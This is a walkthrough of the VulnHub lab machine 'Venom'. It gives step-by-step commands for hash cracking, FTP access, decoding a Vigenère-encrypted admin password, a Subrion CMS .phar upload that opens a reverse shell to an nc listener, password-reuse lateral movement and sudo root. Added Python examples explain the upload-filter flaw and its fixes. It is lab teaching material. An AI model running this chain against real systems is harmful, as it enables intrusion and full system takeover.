Venom (VulnHub – Easy)

Venom is a multi-stage machine that begins with credential recovery from an MD5 hash, pivots through FTP, and reveals a Vigenère-encrypted password for a Subrion CMS admin account. A file upload weakness in Subrion (a denylist that stops .php but not .phar) provides RCE, followed by lateral movement through two users and a final privilege escalation via unrestricted sudo.

Overview

Target: 10.10.10.15
Initial vector: MD5 hash → FTP → Vigenère decode → Subrion CMS admin
Exploitation: upload .phar reverse shell
Privilege escalation: user chaining → sudo bash

Enumeration

Initial web inspection reveals an MD5 hash in the page source:

5f2a66f947fa5690c26506f66bde5c23

Crack it with hashcat (-m 0 is raw MD5; the result is written to cracked.txt and can also be shown afterwards with hashcat --show):

$ hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
-> hostinger

FTP Access

$ ftp 10.10.10.15
Name: hostinger
Password: hostinger

The FTP login exposes a note containing two Base64 strings (the FTP hints). Both are decoded below.

Decoding the Administrator Password

Decode the first string, which is Base64 wrapped three times:

$ echo 'WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=' \
  | base64 -d | base64 -d | base64 -d
-> standard vigenere cipher

Decode the second Base64 string; it points at an online Vigenère tool:

$ echo 'aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=' | base64 -d
-> https://cryptii.com/pipes/vigenere-cipher

Decrypt the password with cryptii (or any Vigenère implementation) using hostinger as the key. Only letters are shifted; the digits and symbols pass through unchanged and do not consume a key character, which is why the decrypted value keeps the same shape as the ciphertext:

L7f9l8@J#p%Ue+Q1234  -->  E7r9t8@Q#h%Hy+M1234
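The two decoding steps above (peeling nested Base64, then Vigenère with a key that only advances on letters) are small enough to script instead of relying on a web tool. The following is an added example, not part of the original write-up; the strings are copied from the page and the Vigenère behaviour (non-letters pass through without consuming key material) is the convention that reproduces the page's result.

```python
import base64

# Strings taken from the write-up above.
LAYERED_B64 = "WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0="
TOOL_B64 = "aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI="
VIGENERE_CT = "L7f9l8@J#p%Ue+Q1234"
KEY = "hostinger"


def peel_base64(blob: str, max_layers: int = 10) -> str:
    """Repeatedly Base64-decode until the result is no longer valid Base64
    or is not printable ASCII, and return the innermost text.

    Heuristic: a real plaintext that happens to be a valid Base64 string of
    the right length would be decoded one step too far, so the layer limit and
    the printable check are guards, not proofs.
    """
    current = blob.strip()
    for _ in range(max_layers):
        try:
            # validate=True rejects anything outside the Base64 alphabet
            # (spaces, ':', '-', ...), which is how we detect the plaintext.
            decoded = base64.b64decode(current, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        try:
            text = decoded.decode("ascii")
        except UnicodeDecodeError:
            break
        if not text.isprintable():
            break
        current = text.strip()
    return current


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Classic Vigenère decryption.

    Letters are shifted back by the corresponding key letter and keep their
    case; digits and symbols are copied through unchanged and do not advance
    the key index (the cryptii default, and what the page's result requires).
    """
    shifts = [ord(c.lower()) - ord("a") for c in key if c.isalpha()]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out = []
    ki = 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shifts[ki % len(shifts)]) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    print(peel_base64(LAYERED_B64))      # standard vigenere cipher
    print(peel_base64(TOOL_B64))         # https://cryptii.com/pipes/vigenere-cipher
    print(vigenere_decrypt(VIGENERE_CT, KEY))  # E7r9t8@Q#h%Hy+M1234
```

If a tool gives a different answer, the usual cause is a mode that advances the key on every character (including digits and symbols); with hostinger as key that produces a different string, so check the tool's handling of non-letters before assuming the key is wrong.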

Accessing Subrion CMS

Add domain:

$ sudo sh -c 'echo "10.10.10.15 venom.box" >> /etc/hosts'

Visit:

http://venom.box
-> Subrion CMS 4.2

Admin login:

http://venom.box/panel
dora : E7r9t8@Q#h%Hy+M1234

Upload directory:

http://venom.box/panel/uploads

Exploitation – Subrion File Upload RCE

Exploit 49876 abuses the admin panel's file upload. Subrion's extension check is a denylist: it refuses .php but lets .phar through. On a stock Debian/Ubuntu Apache + mod_php install the handler mapping in the php module config (<FilesMatch ".+\.ph(ar|p|tml)$"> with SetHandler application/x-httpd-php) also runs .phar and .phtml files as PHP, so the uploaded file executes.
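The gap between what the CMS rejects and what the web server executes is the whole bug. The following added example (not Subrion's code, and not from the original write-up) models the denylist the page describes next to an allowlist, and checks each candidate filename against the stock Apache PHP handler regex to list which uploads would run as code. The filter model and the sample filenames are constructed for illustration.

```python
import re

# Stock Debian/Ubuntu mods-available/php*.conf registers these suffixes with
# mod_php. The regex is case-sensitive, exactly as shipped.
APACHE_PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

# Simplified model (assumption) of the upload filter the write-up describes:
# refuse ".php", accept everything else.
DENYLIST = {".php"}

# Hardened alternative: store only a fixed set of non-executable extensions.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def extension(filename: str) -> str:
    """Lower-cased final extension including the dot, or '' if there is none."""
    _, dot, ext = filename.rpartition(".")
    return ("." + ext).lower() if dot else ""


def denylist_accepts(filename: str) -> bool:
    """The weak check: anything not explicitly listed is allowed."""
    return extension(filename) not in DENYLIST


def allowlist_accepts(filename: str) -> bool:
    """The corrected check: only known-harmless extensions are allowed."""
    return extension(filename) in ALLOWLIST


def apache_executes(filename: str) -> bool:
    """Would the stock handler mapping hand this file to mod_php?"""
    return bool(APACHE_PHP_HANDLER.match(filename))


def executable_uploads(filenames, accepts):
    """Names that pass the given upload filter AND that Apache would execute."""
    return [f for f in filenames if accepts(f) and apache_executes(f)]


# Constructed sample names an attacker might try.
SAMPLE_UPLOADS = [
    "avatar.png", "shell.php", "shell.phar", "shell.phtml", "shell.PHP", "notes.txt",
]

if __name__ == "__main__":
    print("denylist leaks :", executable_uploads(SAMPLE_UPLOADS, denylist_accepts))
    print("allowlist leaks:", executable_uploads(SAMPLE_UPLOADS, allowlist_accepts))
```

Running it shows .phar and .phtml slipping past the denylist while the allowlist lets nothing executable through. Even with an allowlist, the defence-in-depth fix is to make the upload directory non-executable at the web server (php_admin_flag engine off for that directory, or a FilesMatch that denies .ph* there), so a filter bypass yields a download instead of code execution.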

Create a reverse shell by copying the stock Kali webshell under a .phar name, then edit $ip and $port inside the file so they point at your listener:

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.phar

Listener:

$ nc -nlvp 443

Upload shell.phar and trigger it:

http://venom.box/panel/uploads/shell.phar

Shell obtained as www-data.

Lateral Movement

1. Switch to hostinger

The FTP password is reused for the local account. su needs a terminal, so if it complains that it must be run from a terminal, upgrade the reverse shell to a PTY first.

$ su hostinger
Password: hostinger

Enumerating the web root turns up a backup copy of the CMS .htaccess:

/var/www/html/subrion/backup/.htaccess

It contains a password that works for nathan:

FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

2. Switch to nathan

$ su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

User nathan shell obtained.

Privilege Escalation

Check sudo as nathan; the account may run any command as root without a password:

$ sudo -l
-> (root) NOPASSWD: ALL

Root:

$ sudo bash
# whoami
root

Conclusion

Venom is a layered machine: MD5 cracking → FTP hints → Vigenère decoding → Subrion CMS admin → .phar RCE → user chaining → sudo root. It’s a fun example of how multiple weak points combine into a full system compromise.